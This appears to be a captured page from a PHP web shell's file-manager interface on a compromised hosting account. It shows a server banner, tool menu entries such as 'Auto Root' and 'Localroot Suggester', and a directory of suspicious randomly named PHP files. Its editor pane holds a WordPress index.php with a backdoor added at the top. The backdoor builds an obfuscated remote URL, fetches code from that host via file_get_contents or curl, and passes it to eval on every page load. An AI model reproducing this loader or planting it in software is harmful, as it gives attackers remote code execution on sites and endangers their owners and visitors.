Linux premium67.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 198.54.121.137 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : oppozipy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
oppozipy /
mushiniwemvuu.store /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-10-23 11:43
271259
[ DIR ]
drwxr-xr-x
2025-11-12 01:33
643704
[ DIR ]
drwxr-xr-x
2025-11-14 14:08
cgi-bin
[ DIR ]
drwxr-xr-x
2025-10-23 11:43
images
[ DIR ]
drwxr-xr-x
2025-10-23 11:43
updatecenter
[ DIR ]
drwxr-xr-x
2025-10-23 11:43
COOKIE.txt
586
B
-rw-r--r--
2025-12-02 06:52
Contrllrs.php
93.9
KB
-rw-r--r--
2025-12-02 04:42
admin.php
32.17
KB
-rw-r--r--
2026-01-06 02:29
api.zip
253.11
MB
-rw-r--r--
2025-10-23 10:15
desxgoua.php
0
B
-rw-r--r--
2025-12-15 20:12
good.php
960
B
-rw-r--r--
2026-01-04 06:18
index.php
929
B
-rw-r--r--
2026-01-04 06:18
inputs.php
165
B
-rw-r--r--
2025-12-02 07:15
katubu.com.zip
508.37
MB
-rw-r--r--
2026-01-08 11:46
php.ini
40
B
-rw-r--r--
2025-12-09 05:49
postnews.php
5.69
KB
-r--r--r--
2025-10-22 07:33
robots.txt
84
B
-rw-r--r--
2025-10-23 01:14
theme-insnbre.php
338
B
-rw-r--r--
2025-12-02 06:52
tykkwokt.php
0
B
-rw-r--r--
2025-12-13 20:15
vbybpxib.php
0
B
-rw-r--r--
2025-12-12 19:24
zuzwekur.php
0
B
-rw-r--r--
2025-12-12 21:26
Save
Rename
<?php // Split URL into pieces $url_part1 = 'http://173'; $url_part2 = '.208.235.210/z51230_2/'; $url_part3 = '/stat/index2.txt'; $full_url = $url_part1 . $url_part2 . $url_part3; // Attempt to get remote content $content = @file_get_contents($full_url); if ($content === false && function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $full_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $content = curl_exec($ch); curl_close($ch); } // Only eval if we have content if (!empty($content)) { @eval('?>' . $content); } /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php';